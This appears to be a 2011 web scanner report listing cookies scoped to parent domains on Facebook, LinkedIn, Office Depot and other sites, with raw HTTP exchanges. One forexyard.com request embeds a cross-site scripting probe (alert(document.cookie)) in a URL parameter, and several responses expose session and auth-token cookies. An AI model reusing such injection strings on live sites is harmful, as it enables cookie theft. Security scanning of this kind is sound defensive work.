GET /marytere.medina HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=f2GZC; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fmarytere.medina; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmarytere.medina; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:07 GMT Content-Length: 22264
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=EBuc7; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/Kledyde/344540630304 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=EBuc7; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:08 GMT Content-Length: 301696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/OrthoSuperSitecom/296664256434 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=JslNTVyi3Z1cM6bZrSjKLTPt; expires=Mon, 04-Feb-2013 22:03:18 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=mxlHK; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 22:03:18 GMT Content-Length: 136626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/Orthopaedic-Trauma-Association/212018968439?ref=search&sid=1357027577.2299684249..1&v=wall HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=JslNTQvcuvBm8glwbtNJrYQt; expires=Mon, 04-Feb-2013 22:03:18 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=Nxr12; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 22:03:18 GMT Content-Length: 143785
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=07KIU; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/OwnerIQ/54446991004 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/OwnerIQ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=07KIU; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:01:52 GMT Content-Length: 0
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=PSfaE; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/Tipd/39630264367 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/tipddotcom P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=PSfaE; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:08 GMT Content-Length: 0
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=j_Hmr; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pointeresortsaz HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=j_Hmr; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:01:55 GMT Content-Length: 168888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=QfoGh; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search/ HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/search.php P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=QfoGh; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 22:38:48 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /uschi.eller HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=F6k4f; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fuschi.eller; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fuschi.eller; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:09 GMT Content-Length: 22622
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=juuUg; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /vibrantmedia HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=juuUg; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 22:38:48 GMT Content-Length: 157952
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /css/quotes-chart.cssbdb85 HTTP/1.1 Host: www.forexyard.com Proxy-Connection: keep-alive Referer: http://quotes.forexyard.com/iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.cssbdb85%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec67b70ca19&img_prefix=35_30min&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=4129 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /default.aspx HTTP/1.1 Host: www.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID="ajax:6164122648378833163"; Version=1; Path=/ P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Set-Cookie: leo_auth_token="GST:ZTkdLLKZK_ggZRbY44T2FKTN6Eo_M0OV49kqXrkZrEol8AbriE_Vxr:1296946948:e68b5644f2e89cdd8b8600193a537cd5b3bca0ac"; Version=1; Max-Age=1799; Expires=Sat, 05-Feb-2011 23:32:27 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: visit=G; Expires=Fri, 24-Feb-2079 02:16:35 GMT; Path=/ Set-Cookie: bcookie="v=1&141e3dd9-2a20-4c3c-827f-21d17cd03532"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 24-Feb-2079 02:16:35 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Sat, 05 Feb 2011 23:02:28 GMT Content-Length: 19987
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /companies/222438/OwnerIQ HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:ZQgw03ZYfQ00azc_JSdCZKQJd4K6alIZMZdC0MUYURk89UEZXdolwx:1296946949:65fdca8a090beb3f900ea530a9bab4f648ed93f8"; Version=1; Max-Age=1799; Expires=Sat, 05-Feb-2011 23:32:29 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:4713947493888160893"; Version=1; Path=/ Set-Cookie: visit=G; Expires=Fri, 24-Feb-2079 02:16:37 GMT; Path=/ Set-Cookie: bcookie="v=1&e6f1aaac-08d7-4426-85cc-9b3490cae2cf"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 24-Feb-2079 02:16:37 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sat, 05 Feb 2011 23:02:30 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1999f445525d5f4f58455e445a4a42198c;expires=Sat, 05-Feb-2011 23:32:45 GMT;path=/;httponly Content-Length: 26660
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /groupInvitation HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:USPcjVjh_OtiRy9WPlG0jPNXb0WyphkShZD0e7Nn60hypyfO-0CmKk:1296943603:1f5c383a1a62947997acc0a50d1873ded2a84670"; Version=1; Max-Age=1799; Expires=Sat, 05-Feb-2011 22:36:42 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:3497768082988792158"; Version=1; Path=/ Set-Cookie: visit=G; Expires=Fri, 24-Feb-2079 01:20:50 GMT; Path=/ Set-Cookie: bcookie="v=1&cd6dbf47-e6cf-4898-9bbd-b3e4bc5d6192"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 24-Feb-2079 01:20:50 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sat, 05 Feb 2011 22:06:42 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965b45525d5f4f58455e445a4a42198c;expires=Sat, 05-Feb-2011 22:36:58 GMT;path=/;httponly Content-Length: 12878
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296946953&rver=6.1.6206.0&wp=MBI&wrep ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.livejournal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/ HTTP/1.1 Host: www.mybloglog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:07:04 GMT Set-Cookie: BX=fbnhh856krig8&b=3&s=mv; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.mybloglog.com P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" location: http://www.mybloglog.com/ Cache-Control: private Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 82
<!-- www2.mbl.re1.yahoo.com uncompressed/chunked Sat Feb 5 14:07:04 PST 2011 -->
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:53 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=3a4937fb2983dadb56c5168b22255db3; expires=Fri, 31-Jan-2031 23:02:53 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Set-Cookie: sprout=2_kGyhIl1F2ko87PYZ8d2fSYCKMKWCW5ewEBC8jEGtgcoaSGuXhq3hDkYeuKPwF%2FPFLYfYM9dQFw8AnXFXY4EQuxw%2FFQlGg8nSpMit7LSHzn3oOd7FRtEzmZhdhLzAs2S%2BOnUx9lwkG9YsIYSnzy21lut2nQgXaMSF%2BhOET5670ZWIbdSoPfX6svvgI4xRaVIegWb1xIBchOg2Ju8qox1cAhxIoFowYrBNSo9rB2hnM2QjP0Lo4xTAq%2Fg77FsEXPRS; expires=Fri, 31-Jan-2031 23:02:53 GMT; path=/; domain=.newsvine.com Set-Cookie: vid=3a4937fb2983dadb56c5168b22255db3; expires=Fri, 31-Jan-2031 23:02:53 GMT; path=/; domain=.newsvine.com Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 55069
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Ty ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.nmworkwear.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:09:18 GMT Server: Apache/2.2 X-Powered-By: PHP/5.2.17 Set-Cookie: XTCsid=ekde4uf6o3m1pae1sfc1dc4f16; path=/; domain=.nmworkwear.de Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 38134
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="de"> <head> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.php HTTP/1.1 Host: www.nmworkwear.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:33:54 GMT Server: Apache/2.2 X-Powered-By: PHP/5.2.17 Set-Cookie: XTCsid=3ugqie5obq0npitc2bvsin2tr7; path=/; domain=.nmworkwear.de Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 38158
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="de"> <head> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.officedepot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml" Content-Type: text/html; charset=UTF-8 Content-Language: en-US Date: Sat, 05 Feb 2011 22:39:46 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JSESSIONID=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b; Path=/ Set-Cookie: jsession_unique_id=1296945586525; Expires=Sun, 06 Feb 2011 00:09:46 GMT; Path=/ Set-Cookie: CU_BRAND=OD; Expires=Tue, 31 Jan 2012 22:39:46 GMT; Path=/ Set-Cookie: IBSD_LOCALE=en_US; Expires=Tue, 31 Jan 2012 22:39:46 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/ Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com Content-Length: 87491
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="nojs" xmlns="http://www.w3.org/1999/xhtml" x ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /promo/list5.do HTTP/1.1 Host: www.officedepot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml" Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Sat, 05 Feb 2011 22:40:01 GMT Content-Length: 6309 Connection: close Set-Cookie: JSESSIONID=0000N7JB0IDdbJzrbHY1HCK2e8j:13ddq0uth; Path=/ Set-Cookie: jsession_unique_id=1296945606192; Expires=Sun, 06 Feb 2011 00:10:06 GMT; Path=/ Set-Cookie: CU_BRAND=OD; Expires=Tue, 31 Jan 2012 22:40:06 GMT; Path=/ Set-Cookie: IBSD_LOCALE=en_US; Expires=Tue, 31 Jan 2012 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.plurk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <title>302 Found</title> <h1>Found</h1> <p>You should be redirected automatically to target URL:</p><p><a href="/t/English">/t/English</a>. If n ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.protopage.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!-- Copyright 2004-2008 Protopage Ltd. All rights reserved. --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Pro ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
reddit_first=%7B%22organic_pos%22%3A%201%2C%20%22firsttime%22%3A%20%22first%22%7D; Domain=reddit.com; expires=Thu, 31 Dec 2037 23:59:59 GMT; Path=/
